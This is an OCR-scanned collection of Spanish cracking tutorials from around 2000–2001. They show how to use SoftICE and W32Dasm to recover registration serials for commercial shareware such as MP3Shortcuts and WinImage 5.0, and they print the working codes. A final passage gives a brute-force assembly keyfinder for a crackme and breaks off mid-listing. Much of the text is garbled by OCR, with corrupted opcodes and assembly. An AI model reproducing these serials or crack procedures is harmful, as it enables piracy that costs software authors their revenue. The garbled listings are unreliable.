verify your registration information and try again. if you continue to encounter problems, report them at 
www. heathcosoft.com 


a continuación... cerramos mp3shortcuts v1.0 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 
a continuación...abrimos mp3shortcuts y vamos directamente a la caja de registro en donde introducimos nuestro nombre, 
y cualquier código de registro. todavía no damos click en register ; lo que ahora debemos hacer es presionar 


control+dpara que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx getwindowtexta y presionamos enter, luego presionamos f5 para salir del 
softice. ahora le damos click aregister y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez, ponemos bc * para quitar el bpx y si todo sale bien estaremos aquí: 
015f: 00401438 57 push edi 
ahora presionamos f10 24 veces para llegar a una parte realmente importante del código: 


015f: 00401483 50 push eax -> d eax =zzlzmlbrvlukbtft, d ebx =nuestro registro falso. 


015f: 00401484 53 push ebx -> lo mismo de arriba 
015f: 00401485 ff154c904000 call [kernel32! Istremp] ->cmp dice algo :) 
015f: 0040148b 85c0 test eax,eax -> algo se prueba :) 
015f: 0040148d 0f858c000000 ¡nz 0040151f -> salto bueno, nos manda al mensaje de registro válido. compruébalo con r fl z 
ya lo hemos hecho, fue realmente sencillo... 
015f: 00401483 50 push eax -> d eax =zzlzmlbrvlukbtft------ > nuestro registro válido :) 
en mi caso la caja quedaría así: 
registration name: act mago 
registration code: zzlzmlbrvlukbtft 
le damos click a register y... 
thank you for registering mp3shortcuts. 


restart the program in order to enable the registered features 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 
saludos a profesor x. 
saludos a dek_oin. 
saludos a crkviz. 


saludos a code_ mex. 


saludos a tnt!crack!team ( saludos a xasx, no pararé : ) ) http://www.tntcrackers.ws 


saludos a karpoff ( excelente página loco!!) http://welcome.to/ karpoff 


saludos y agradecimientos aviperde! grupo [k-for], por el genial file inspector. 


saludos a toda la people detutoriales2000. 


saludos al Idea ( monofeo (gran amigo), flaco, chirda, taza, afo, solerman, nasal, peter y a todos los demás) 


saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Winimage 5.0 


Código de registro 

Conseguir el código de registro tanto para la versión Profesionál como para la Estándar. 
Utilidad para la gestión de imagenes de disco. 
Aficionado 

wWww.winimage.com 

Softice W32dasm 


Txeli FECHA: 16/12/2000 


INTRODUCCION 
winimage es un programa que nos permitirá hacer una imagen de nuestros discos. 


existen dos versiones of winimage : estándar y profesional. 


las opciones de registro son diferentes : 
winimage 5.0 profesional - precio para nuevos usuarios de winimage $60. 
winimage 5.0 estándar- precio para nuevos usuarios of winimage $30. 


winimage 5.0 developer edition - precio para nuevos usuarios $200 


"o gratis al adquirir el softice ;-)" 


- propiedades de archivo- permite la modificación de las fechas de archivo en el interior de la imagen. 

- es posible exportar el directorio de la imagen actual en texto o html. 

- impresión del directorio de la imagen 

- edición de las propiedades del sector de arranque (i.e. cargar otro archivo de sector de arranque, editar 
texto en el sector de arranque...) 

- soporta la creación de grandes imágenes de medios removibles o discos duros bajo windows nt y windows 95. las 
imágenes grandes (> 2.88 mb) no se cargan en memoria, realizándose las operaciones de lectura escritura 


directamente en 


el archivo imagen. 


"sacado de la ayuda del programa." 


bueno, así que 60$ la versión profesional. con ese dinero podríamos tomarnos unas cervezas con los colegas ¿no? 
pues vamos a ver si nos lo podemos ahorrar. 


al atake 


vamos a ver que sorpresas nos depara el programa. arrancamos como siempre, y al principio nos muestra una pantalla 
diciéndonos que los días que nos quedan de evaluación, así como que no nos olvidemos de registrarlo. no hijo no, si 
precisamente es eso lo que queremos, registrarnos :-) 


abrimos el ejecutable con el w32dasm, y echamos un vistazo a las strgref. 


string resource id=01061: 
string resource id=01062: 
string resource id=01063: 
string resource id=01064: 
string resource id=01065: 
string resource id=01066: 
string resource id=01067: 
string resource id=01069: 
string resource id=01070: 
string resource id=01071: 
string resource id=01072: 
string resource id=01073: 
string resource id=01074: 
string resource id=01075: 
string resource id=01078: 
string resource id=01079: 
string resource id=01081: 


"browse" 

"disk error on track %lu, head % lu" 

"always on átop" 

"do you want to inject %lu files occuping %lu bytes?" 
"inject" 

"your registration code is valid.you are now a registered" 
"registering information is invalid" 

"winimage registration" <--- doble click aquí 
"increment" 

"name" 

"size" 

"date" 

"time" 

"insert floppy n* %lu to read" 

"batch assistant" 

"you must fill the image set filename text" 

"wave file(*.wav)|*.wav| midi file(*.mid;*.rmi)|*.mid;*. rmil" 


apareceremos aquí: 


:0042f0e1 “7529 
:0042f0e3 6800200000 


:0042f0e8 6824040000 

:0042f0ed 8935b43£4400 
:0042f0f3 893500c414400 
:0042f0f9 88151834400 


* possible reference to string resource id=010609: 


jne 0042f10c 
push 00002000 


"winimage registration" 


push 0000042d <-- aquí aparecemos 
mov dword ptr [00443fb4], esi 

mov dword ptr [0044410c], esi 

mov byte ptr [00443d18], dl 


si subimos un poco, nos encontramos 2 saltos condicionales, los cuales si cambiamos, nos mostraran el mensaje de 
“your are registered to use both winimage standard and profes" que en cristiano, viene a decir mas o menos, que ahora 


somos usuarios registrados tanto de la versión estándar como de la profesional . 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:0042f0c1(c) 


| 

:0042f0c9 3915ac404400 cmp dword ptr [004440ac], edx 
:0042f0cf 890438434400 mov dword ptr [00444338], ecx 
:0042f0d5 7505 ¡ne 0042f0dc ;12 salto 
:0042f0d7 a338434400 mov dword ptr [00444338], eax 


* referenced by a (u)nconditional or (c)onditional jump at address: 


|:0042f0d5(c) 

| 

:0042f0dc 6a01 push 00000001 

:0042f0de 3bc2 cmp eax, edx 

:0042f0€0 5e p esi 

:0042f0e1 7529 jne 0042f10c ¿22 Salto 
:0042f0e3 6800200000 push 00002000 


¡pero....... ! el programa sigue sin estar registrado, de hecho nos sigue apareciendo la nag, y nos sigue contando el tiempo de 
evaluación, así que ¡acercamiento incorrecto! un poco mas arriba de los saltos vemos una llamada, ¿será la llamada a la 
rutina de comprobación? 


:0042f09c ff7508 push [ebp+08] 

:0042f09f ffd6 call esi 

:0042f0a1 68e8404400 push 004440e8 

:0042f0a6 57 push edi 

:0042f0a7 53 push ebx 

:0042f0a8 e81c570000 call 004347c9 ¡la llamada 
:0042f0ad 8b0de8404400 mov ecx, dword ptr [004440e8] 
:0042f0b3 83c40c add esp, O000000c 
:0042f0b6 33d2 xor edx, edx 

:0042f0b8 a3dc3e4400 mov dword ptr [00443edc], eax 
:0042f0bd 3bc2 cmp eax, edx 

:0042f0bf 5f pop edi 


comprobémoslo con el sice, a fin de cuentas lo que nos interesa es conseguir un serial valido. 


cargamos como siempre nuestra victima, y al saltar el sice, ponemos nuestro breakpoint con bpx 0042f0a8, ctrl + d y salimos 
del sice. vamos a opción > registrarse... y metemos nuestros datos, en mi caso: 


nombre: txeli k-for 
código de registro: 123456789 


damos a aceptar, y aparecemos en el sice, concretamente aquí: 


:0042f0a7 53 push ebx 

:0042f0a8 e81c570000 call 004347c9 ¡aquí aparecemos 
:0042f0ad 8b0de8404400 mov ecx, dword ptr [004440e8] 
:0042f0b3 83c40c add esp, O000000c 

:0042f0b6 33d2 xor edx, edx 

:0042f0b8 a3dc3e4400 mov dword ptr [00443edc], eax 

:0042f0bd 3bc2 cmp eax, edx 

:0042f0bf 5f pop edi 

:0042f0c0 5b pop ebx 


:0042f0c1 7406 je 0042f0c9 
:0042f0c3 890dac404400 mov dword ptr [004440ac], ecx 


pulsamos f8, para entrar en la call, y nos encontramos con esto: 


:00434'7c9 55 push ebp ¡introduce nombre en la pila 

:00434'7ca 8bec mov ebp, esp 

:004347cc 8lec00020000 sub esp, 00000200 

:00434'7d2 56 push esi 

:004347d3 8b7510 mov esi, dword ptr [ebp+10] 

:00434'7d6 85f6 test esi, esi 

:004347d8 57 push edi ¿introduce serial en la pila 
:00434 709 7403 je 004347de 

:004347db 832600 and dword ptr [esi], 00000000 


vamos trazando con "f10", para ver que nos encontramos, y mirando los registros con "d" poco mas abajo, encontramos una 
llamada a la dirección 004346cd, (:004347e8 eSe0feffff call 004346cd) entramos en ella con f8 y aparecemos aquí: 


:004346cd 80442408 mov eax, dword ptr [esp+08] 
:004346d1 803820 cmp byte ptr [eax], 20 ¿d eax ---> txeli k-for 


; comprueba nuestro nombre 
Sin f10 hasta llegar a: 


:004347f5 8bf8 mov edi, eax ¿volvemos a comprobar 
:004347f7 83c40c add esp, 0000000c ¿d edi ---> 123456789 nuestro serial falso 


Sais f10 hasta llegar a: 


:004348la 59 pop ecx ¿saca ecx de la pila, pero ¿que tiene ecx? 
:0043481b 59 pop ecx ¿d ecx ---> 109chf57 
:0043481c 50 push eax ¡parece nuestro serial correcto ;) 


pues ya está, borramos los breakpoints con "bc*" abrimos el programa, y nos registramos, 


“your registration code is valid. 
you are now a registered us" 


vamos a opción > modo de selección de winimage, y vemos que pone, "you can use the standard version, or test the 
professional " que en cristiano, quiere decir que estamos registrados solo para la versión estándar. 


¡pero no es eso lo que yo estoy buscando! yo quiero registrar las dos versiones. así que, vuelta a empezar. pero, antes 
tendremos que volver a ser usuarios no registrados. para eso, tendremos que borrar los valores que introduce winimage en el 
registry de windows al registrarnos. para eso, abrimos el regedit, (yo haría una copia de seguridad del registro, por lo que 
pueda pasar, pero como el pc es tuyo, pues tu mismo), vamos a hkey_current_usen softwarelwinimage 


cambiamos el valor "winimageuseregistry" de true a false,( botón derecho sobre el valor, modificar) modificamos los valores 
de "nameregistered" y "coderegistered" para que queden vacíos, y ya tenemos la versión de evaluación de nuevo. 


— en busca del serial perdido E 


cargamos nuevamente winimage, al saltar el sice ponemos nuestro breakpoint (bpx 0042f0a8) e intentamos registrarnos otra 
vez con el numero falso, ya que es mas fácil de rastrear. 


:0042f0a7 53 push ebx 
:0042f0a8 e81c570000 call 004347c9 ¡aquí aparecemos 
:0042f0ad 8b0de8404400 mov ecx, dword ptr [004440€8] 


ais f8 para entrar y f10 hasta llegar a: 


:0043481b 59 pop ecx ¡aquí nos quedamos antes 


seguimos trazando con f10, y mirando lo que contienen los registros con el comando "d". 


:00434832 50 push eax 


:00434833 8d8748190514 lea eax, dword ptr [edi+14051948] ¡introduce nuestro serial en la pila 
:00434839 50 push eax ¿d eax ---> 123456789 

:0043483a 8d8500feffff lea eax, dword ptr [ebp+fffffe0O] 

:00434840 50 push eax 

:00434841 es36ffffff call 0043477c ¡llamada para comprobar nuestro serial 

:00434846 59 pop ecx 

:00434847 59 pop ecx ¿d ecx ---> 24alab9f otro n2 para la versión estándar 


seguimos buscando, recuerda que queremos la versión profesional, así que... f10, y a ver que encontramos. llegamos a: 


:00434868 50 push eax ¡Introduce nuestro serial en la pila 
:00434869 eso0effrfff call 0043477c ¡llamada de comprobación del serial 
:0043486e 59 pop ecx 

:0043486f 59 pop ecx ¿d ecx ---> 27a2aba8 n* para la estándar 


;pues seguimos buscando 


iia e f10 hasta llegar a: 


:00434890 50 push eax ;¿te suena? :) 

:00434891 eseofeffff call 0043477c 

:00434896 59 pop ecx 

:00434897 59 pop ecx ¿d ecx ---> 20alabdb n* para la version profesional ¡bingo! 


¡pero si habia varios n2 para la star, 
¿por que no para la profesional? seguimos buscando 


E f10 hasta llegar a: 


:004348b8 50 push eax ¿de nuevo el mismo patrón 

:004348b9 e8befeffff call 0043477c 

:004348be 59 pop ecx 

:004348bf 59 pop ecx ¡d ecx ---> 149dabec n2 para la estándar :) 


tae f10 hasta llegar a: 


:004348e5 50 push eax ;y ota vez mas lo mismo 

:004348e6 e891feffff Call 0043477c 

:004348eb 59 pop ecx 

:004348ec 59 pop ecx ¿d ecx ---> 12a2abee n? para la profesional :) 


seguimos buscando, pero parece que se acabó. ¿que te parece? nada menos que 6 números de serie, todos distintos, y todos 
validos para el mismo nombre de usuario. ¿porqué? 


parece que el programa coge nuestro numero, y nuestro nombre, genera a partir de ellos el numero de serie correcto, y lo 

compara con el nuestro, si es valido, nos saca el mensaje de "usuario registrado", si no lo es, empieza a comprobar si es de 
la versión estándar o de la profesional, y si no me equivoco, alguno de los que genera debe de ser también el de la developer 

edition, la verdad es que no lo he comprobado, pero si alguien lo hace, por favor que me lo diga, es por simple curiosidad. 


bueno, pues como decía la ventana inicial "no olvides registrarte”. 


te recuerdo, que si te gusta el programa, debes comprarlo ya que el shareware es nuestra mejor fuente de experimentación. 


toda la información aquí mostrada es exclusivamente materia de aprendizaje, no me hago responsable de lo que puedas 
hacer con ella, ni lo que pueda pasar a tu equipo si lo haces mal. 


para conseguir mas material para aprender, visita mi pagina y la de mi grupo, ahí encontraras todo lo necesario para 
aprender. 


quiero agradecer con este tutorial la ayuda que me están dando en este mundillo mis amigos, el profesor x, sin la ayuda del 
cual este tutorial no habría sido posible, [dek_oin] gracias por tus consejos maestro, y todos los miembros de k-for entre 
otros, (disculpad que no ponga todos los nombres aquí, pero entonces la lista seria tan larga como el tutorial) y por supuesto 
a ti, que me estás leyendo. 


p.d. no crackeamos, ni por dinero, ni bajo pedido, así que los e-mails del tipo, "dime como se crackea tal 
programa", "¿puedes enseñarme a crackear en 5 min.? necesito crackear una mochila (pure+blood, esto va 
por ti)" o "te doy x$ por crackear este programa" serán automáticamente eliminados, o peor aun, los 
incluiremos en una lista con tu nombre y dirección de e-mail para que seas el blanco de todas nuestras bromas 


:-) 


txeli: 


http: //club.telepolis. con/txelienlinea/index. htm 
txeli_enlineaiHhotmail.com 


grupo k-for: 
http: //pagina.de/kfor 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 2001 


TODOS LOS DE SOFTWARE BY DESIGNE 


PROTECCION: Serial, Límite de Tiempo 

Objetivo: Encontrar el serial válido 

Descripcion: Sin palabras :( 

Dificultad: Facilísima 

DOWNLOAD: http: //www.gregorybraun.com 

Herramientas: Softice 

CRACKER: BYtEsKrAcK FECHA: 14/11/2000 


introduccion 


este es mi primer tutorial que realizo asi que por favor disculpenme por cualquier error que pueda tener, a 
parte de que no sé, en qué programa abran creado esta plantilla pues no puedo ver que estoy escribiendo... 


aaahhh!!! perdonen la falta de ortografiá pero si leyeron lo anterior comprenderan.... 
regularmente no escribo tan mal.... 


al atake 


otra pantalla oscura.... bueno, esperenme me voy a cambiar de programa.... ok. 


ya está, el bloc de notas sirve para algo... bueno basta de bla, bla y vamos a lo que nos interesa, espero que ya hayas 
descargado el programa que deseas de la página de gregory braun, bueno pues empezaremos por lo más sencillo... 


inicia el programa que escogistes en mi caso fxedit, lo inicio y ya cargó... ok. 


primero ingreso un user name  = byteskrack 
segundo ingreso un organization = me! <- esto por que no estoy en ningún grupo crack 
tercero ingreso un registration = 123456  <- mi numero de serie no válido, me explico 


seguro ya sabrás que es un número de serie o serial...? :) 
bueno, ya que tenemos todo eso iniciamos softice presionando ctrl+d y colocamos un break point que llame a la 


función getdlgitemtexta esta es una función que está en user32.dll si no estoy mal, la sintaxis que deben colocar en la 
línea de comandos es la siguiente, 


bpx getdlgitemtexta <-seguro ya saben esto 


ya que hemos hecho esto volvemos a nuestra victima presionando ctrl+d (no olviden puede ser la que quieran, siempre 
y cuando este en gregorybraun.com), y presionamos el botón ok. 


y guuuaaaa!!!! de pronto nos aparece softice de acuerdo, presionemos ahora una vez f12, y aqui empieza lo 
emocionante... presionemos otra vez f12 y ahora escribamos el commando d esi y nos deberá aparecer en la ventana de 
caracteres nuestro user name y organization, volvamos a presionar f12 y de aqui en adelante presionemos 16 veces f10 
y voila!!!! (si en 16 veces no llegan seguramente habrá cambiado la direccion de comparacion pero no se preocupen 
sigan y vayan despacio y más adelante la encontrarán) 


debimos de haber aterrizado en 

0000:00000000 3bc3 cmp eax,ebp 

la direccion de memoria puede variar... 

ahora escribamos... 

?ebp -> nuestro número de serial no válido... en mi caso 123456 
ahora escribamos... 

? eax -> nuestro número de serial válido... en mi caso 10020083 
no olvidemos quitar el bp que pusimos... 

bc * 

presionemos ctrl+d y volvamos a nuestra victima... 

clickeamos en ok y ahora ingresamos el serial válido para nuestro nombre y ya está... 
estamos registrados... y además nos agradecen 


no olviden que esto no es con fines comerciales, si les gusta el programa es mejor que lo compren, este tutorial ha sido 
realizado para uso educacional y unicamente para demostrar lo fácil que resulta desbloquear una serie de aplicaciones 
de un mismo autor. (a veces) 


saludos a todos los buenos amigos, este tutorial está dedicado a mi wife and baby!!! 


byteskrack 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


PROTECCION: 


Karpoff Spanish Tutor 2001 


Programa: NI2CRACKME 


Encriptación del código, sólo el serial bueno lo desencripta 


Objetivo: Encontrar el serial. 
Descripcion: Un Crackme con muy mala leche. 
Dificultad: Aficionado 
DOWNLOAD: ni2crackme 
Herramientas: Masm, Sice y PUPE (opcional) 
Crack el Destripador € Marmota 
CRACKER: FECHA: 22/01/2001 


introduccion 


el incrackeable... 

así se llamo durante mucho tiempo este crackme... 

personalmente opino que no hay nada incrackeable, todo es cuestión de tiempo y 
constancia. pero este crackme ha estado mas cerca de esta calificación que 
cualquier otro programa que (por lo menos yo) conozca. 


es tal su singularidad, que no tiene ningún tipo de protecciones añadidas, como 
pudieran ser los típicos anti-debug, anti-dump, anti-desensamblador, etc. (y ni 
puñetera falta que le hace). tan solo, puro y “simple” asm. 


la clave a buscar debe de reunir unas determinadas características. según el 
autor: 


la clave contiene 8 letras (caracteres entre a-z), es decir, caracteres del alfabeto español, 
tanto mayúsculas como minúsculas) 
tampoco existen espacios 
la palabra no aparece en el diccionario (p.e.: holapepe, no esta en el diccionario :-)) 


con estos datos es fácil calcular el numero de combinaciones posibles. 26 
mayúsculas + 26 minúsculas = 52 caracteres posibles. 


como son 8 letras serian: 528 = 5,345972853146e+13 o sea 53.459.728.531.460 
que traducido al cristiano serian 53 billones 459 mil millones y pico. vamos... 
para desanimar a cualquiera. xdddddddddddd. 


mas adelante, y gracias a nuevas pistas proporcionadas por el autor, esta 
cantidad se redujo considerablemente. la primera letra empezaba por “h”. esto 
nos dejaba el numero de combinaciones posibles en tan solo 1.028.071.702.528 , 
poca cosa... 1 billoncete 28 mil millones de nada. 


esta clave es imprescindible para desencriptar un pedacito de código, donde se 
ocultan las instrucciones y los datos necesarios para la presentación de la 


messagebox que nos anunciara nuestro éxito. 
al atake 


vamos a omitir la presentación del listado asm completo, solo pondremos los bloques que nos interesan para 
comprender la forma con que trabaja este endiablado engendro (a falta de otros calificativos ;-)). 

esta es la rutina principal de desencriptación. se utiliza 3 veces en el programa, (luego veremos para que). este es el 
listado original de la zona del código por la que pasa la cadena introducida. cuando se llega a ella la 1? vez, esi apunta 
al buffer donde se ha guardado la clave introducida en el control de edición y eax vale 0. 


0187:004012fe 33c0 xor eax,eax 
0187:00401300 51 push ecx 

0187:00401301 56 push esi 

0187:00401302 52 push edx 

0187:00401303 33d2 xor edx,edx 
0187:00401305 4e dec esi 

0187:00401306 46 inc esi 

0187:00401307 3226 xor ah,[esi] 
0187:00401309 32c2 xor al,dl 
0187:0040130b 052032494e add eax,4e493220 
0187:00401310 8ac8 mov cl,al 
0187:00401312 d3c8 ror eax,cl 
0187:00401314 355a5aaa55 xor eax,55aadada 
0187:00401319 664a dec dx 

0187:0040131b 75ec jnz 00401309 
0187:0040131d 803e00 cmp byte ptr [esi],00 
0187:00401320 75e4 ¡nz 00401306 
0187:00401322 5a pop edx 

0187:00401323 5e pop esi 

0187:00401324 59 pop ecx 

0187:00401325 c3 ret 


resumiendo... estas pocas instrucciones provocan 9 bucles de ffff veces cada uno (uno para cada letra + el del final) la 
comprobación de que se ha llegado al final de la cadena se produce después de que la instrucción 401306 inc esi 
apunte a un byte de valor 0, y realice toooodo el bucle ffffh veces otra vez. | resultado de todo este barullo es devuelto 
en eax, y para que la cadena sea considerada como valida tiene que cumplir la condición 

eax = 84aeb79e. 


0040121e cmp eax, 84aeb79eh 
00401223 jz 40123d 


llegados a este punto y en vista de la descomunal cantidad de instrucciones que debe procesar la máquina para pasar 
todas las combinaciones posibles 9 veces por este fragmento de código, es fácil pensar, o al menos así lo creyó ni2, que 
es imposible dar con la combinación buena, por ese motivo queremos hacer especial hincapié en la necesidad de 
aligerar lo máximo posible el código que busque el serial adecuado, de lo contrario probablemente moriríamos de 
viejos antes de dar con él. también comentaros que tan solo una combinación hace que se desencripte el código a 
ejecutar. no penséis que invirtiendo el salto o forzándolo vais a conseguir algo... xdddd. bueno, sí conseguiríais un 
cuelgue, y con un poco de suerte tener que reiniciar el trasto. jeje. 

he intentado revertir la función, es decir, hacer que empiece por el final, y repita todo el ciclo al revés. pero al llegar a 
la instrucción xor ah, [esi] estaba igual que al principio, tendría que poner todos los valores posibles donde apunta esi 
en ese momento y el resultado seria peor. 

si la cadena introducida no pasa este test, nos tira de un patadon a la calle, y si pasa el test nos lleva a un lugar de lo 
más interesante. 


¿Quién tiene la clave? 
como en casi todas las películas, la clave la tiene eax. pero... 


0040123d mov eax, 40124e ;puntero al código encriptado 
00401242 mov ecx, 68h ;n* de bytes a cambiar 

00401247 mov edx, esi ¡puntero al buffer donde esta la clave 
00401249 call 401326 


empieza la movida... esta vez eax vale 48415348 antes de entrar en la rutina principal. siiii esa de los bucles sin fin. 


00401326 pusha 

00401327 mov edi, eax 
00401329 mov esi, edx 
0040132b mov eax, 48415348h 
00401330 xor al, [esi] 
00401332 call 401300 


resultado... al entrar en la rutina con un valor eax distinto de 0, el resultado ya no es nuestro querido 84aeb79e, si no 
otro distinto, a saber... 


00401337 mov ebx, eax 
y ese resultado se carga en ebx, que luego servirá para la desencriptacion. 


00401339 xor ah, [esi] 
0040133b call 401300 


otro xor y otra llamada a la super rutina. que nos devuelve un nuevo valor para eax, y ya esta... ya se puede 
desencriptar el churro. 

al llegar aquí tenemos que edi apunta a la zona encriptada, en ebx tenemos el valor devuelto por la 2* llamada a la 
super rutina, en eax, el valor de la 3* llamada y en ecx el n* de bytes a desencriptar. 


00401340 shr ecx, 2 
00401343 mov edx, ecx 
00401345 xor [edi], eax 
00401347 mov cl, al 
00401349 add edi, 4 
0040134c rol ebx, cl 
0040134e xor eax, ebx 
00401350 mov cl, bh 
00401352 ror eax, cl 
00401354 add ebx, eax 
00401356 dec edx 
00401357 ¡nz 401345 
00401359 popa 
0040135a retn 


atacando por los flancos 


se podría intentar un ataque en esta zona, dando por supuestas las primeras instrucciones que se deben ejecutar para la 
presentación de una messagebox (de eso se trata ¿no?). tengo referencias de que metamorfe consiguió desencriptar esta 
zona de código (aun no se como, ya que no conozco ningún escrito ni tute explicando como y donde). la teoría seria la 
siguiente: 


instrucciones necesarias para una messagebox 


6400 push O ¡botón aceptar mb_ok 

ÓSXXXXXXXX push xxXXxxxx ¡puntero al caption 
ÓSXXXXXXXX push XxXxxxxx ;puntero al texto 
6400 push O ;handle del dialogo 

e8xxxxxxxx call xxxxxxxx ;llamada a la función 


las x sustituyen las direcciones donde se deberían encontrar los datos correspondientes. sabemos que deberían estar 
entre la dirección 0040124e y 0040124e + 68h (¿recordáis el n* de bytes a desencriptar?)= 004012bS5. si afinamos mas, 
podíamos descontar los bytes necesarios para completar la función de messagebox. vamos... que las direcciones donde 
se podría esconder el caption y el mensaje estarían entre 00401261 y 004012b5. 


nos hacen falta solo los 8 primeros bytes en 2 dwords, una para la primera eax y otra para la segunda eax (tranki... ya 
me explico). 


6a0068xx 


en este caso las xx pueden tomar un valor entre 61h y b5h. 
y XXXXxXx08 
aquí no hay problema, las x solo pueden valer 124000. 


y ahora los valores que tenemos en la zona protegida son: 
0975ef94 y 2b3c11c7 


xoreando 0975ef94 xor 620068xx = 637587xx 

para obtener todos los valores posibles (xx estará entre 61h y b5h) solo hay que hacer operaciones. xdddddd 

xoreando 2b3c11c7 xor 12400068 = 397c1 laf 

ok, volvemos a la rutina anterior. en el primer ciclo, eax debe valer xx877563 y al completar el primer ciclo eax valdrá 
af117c39 


00401340 shr ecx, 2 
00401343 mov edx, ecx 
00401345 xor [edi], eax 
00401347 mov cl, al 
00401349 add edi, 4 
0040134c rol ebx, cl 
0040134e xor eax, ebx 
00401350 mov cl, bh 
00401352 ror eax, cl 
00401354 add ebx, eax 
00401356 dec edx 
00401357 ¡nz 401345 
00401359 popa 
0040135a retn 


podemos escribir una pequeña rutina que nos calculara el valor de ebx, para los 2 valores estimados de eax. 


xor ebx, ebx 

a0: 

mov eax, xx8/7363 
mov cl, al 

rol ebx, cl 

xor eax, ebx 

mov cl, bh 

ror eax, cl 

cmp eax, af117c39 
je lotengo 

inc ebx 

jmp a0 


esto en teoría debería funcionar, tendríamos los valores iniciales de eax y ebx. pero en la practica no funciono... ni2 se 
supero otra vez. para montar la messagebox utilizo lo siguiente: 


6400 push 00 ¡botón mb_ok 
b858124000 mov eax, 00401258 ;carga en eax la dirección del caption 
50 push eax ;y luego la pushea 


de forma que desmontaba todas nuestras suposiciones. tal vez algún día metamorfe nos diga como adivino estos 
cambios. 


fuerza bruta ¿qué remedio? 


pues si...solo quedaba el recurso de la fuerza bruta, pero con la cantidad de combinaciones existentes y la enormidad 
de los bucles que hay que pasar (mas de medio millón de instrucciones para comprobar cada cadena), había que pensar 
en la forma de acelerar el proceso siguiendo unas pautas lógicas. 

este es el listado asm que desarrollamos crack el destripador y un servidor para la ocasión (ni2, vaya que nos diste 
trabajo). el programa se llamo en un principio destripador, pero después de... 9, 10 versiones (no ma cuerdo), lo 
llamamos marmó6.exe. tiene la particularidad de utilizar un sistema de filtros para evitar que cadenas sin sentido entren 
en los bucles quasi-infinitos de los test. 

las cadenas que cumplen las condiciones son almacenadas en un archivo de texto llamado marmota4.txt, y en ese 
archivo se introduce la cadena desde donde empezara la búsqueda, seguida de un salto de línea y retorno de carro para 


equilibrar los caracteres de control. es posible que algún cracker más avispado sea capaz de dar con la solución de otro 
modo, nosotros no hemos visto otra salida y quizás nadie la haya visto, ya que éste monstruo ha estado sin solución 
hasta la fecha. 


el arma para matar dinosaurios 


486 

.model flat,stdcall 

option casemap:none 

include masm32úincludewindows.inc 
include imasm32úncludeluser32.inc 
include imasm32úncludeMkernel32.inc 
includelib 1masm32Mibluser32.lib 
includelib Ímasm32Miblkernel32.lib 


.data 


buffer db 256 dup (0) 
sacabo db "se ha terminado el tiempo",0 
marmota db "marmota % crack el destripador 2000",0 
archivo db "marmota4.txt",0 
mayusculas db O 

vocales db O 

efes db O 

cues db 0 

ges db 0 

cetas db O 

haches db O 

uves_dobles db O 

jotas db O 

kas db 0 

emes db 0 

enes db 0 

pes db 0 

erres db 0 

eses db O 

tes db O 

uves db 0 

exis db 0 

bes db 0 

ces db O 

des db 0 


consonantes db O 
.data? 


hinstance dd ? 
hfichero dd ? 
fsize dd ? 
memptr dd ? 
bread dd ? 
bwrite dd ? 


.code 

start: 
invoke getmodulehandle,null 
mov hinstance,eax 


call leer 
jmp altajo 
mas]: 


mov esi, offset buffer 
inc esi 

mov ecx, 7 

al: 

inc byte ptr [esi] 

.1£ byte ptr [es1]==05bh 
add byte ptr [esi], 6 
.endif 


cmp byte ptr [esi], 7bh 
jnz sigue 

mov byte ptr [esi], 41h 
inc esi 

loop al 


sigue: 


mov esi, offset buffer 

1£ dword ptr [esi]==0727a7a48h 
1£ dword ptr [esi+4]==0742727a7ah 
jmp fin 

.endif 

.endif 


; este codigo es mucho mas rápido 


;* sustituido filtro: ahora elimina las que tienen menos de 2 mayusculas 


OO OOOO IÓ 
> 


; eliminar: filtro que elimina las cadenas que no contienen 


; 2 mayusculas 
OO OOOO 
> 


; mov esi, offset buffer 
mov mayusculas, 1 ; esto por la h 


; ho es necesario comprobar que sea mayor que 40, todas son mayor que 40 


mov ax, word ptr [esi+1] 
if al < 05bh 

inc mayusculas 

.endif 

if ah < O5bh 

inc mayusculas 

.endif 

mov ax, word ptr [esi+3] 
if al < 05bh 

inc mayusculas 

.endif 

if ah < O5bh 

inc mayusculas 

.endif 

mov ax, word ptr [esi+5] 
if al < 05bh 

inc mayusculas 

.endif 

if ah < O5bh 

inc mayusculas 

.endif 

1f byte ptr [esi+7]< OSbh 
inc mayusculas 


.endif 


.1f mayusculas !=2 
jmp masl 
.endif 


od ole ale ode ole ale ode ole ole ode ole ale ode ole le ode ole ale ode ole le ode ole le ode ole ale ode ole le ole ole ole ode ole ole ode ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole ole 
> 


; eliminar2: filtro que elimina las cadenas que contienen dos 
; mayusculas 


; consecutivas 
E OOOO OS 
> 


; el segundo caracter ya está sujeto a a,e,1,0,Uu, y 


mov ax, word ptr [esi+2] 
if al < 05bh 

if ah < O05bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+3] 
if al < 05bh 

if ah < O5bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+4] 
if al < 05bh 

if ah < 05bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+5] 
if al < 05bh 

if ah < O5bh 

jmp masl 

.endif 

.endif 


mov ax, word ptr [esi+6] 
if al < 05bh 

if ah < 05bh 

jmp masl 

.endif 

.endif 


OOO OOOO 
> 
k 


> 


;* he comprobado en un diccionario ingles que solo empiezan 
;* las palabras por ha, he, hi, ho, hu y hy. en español 

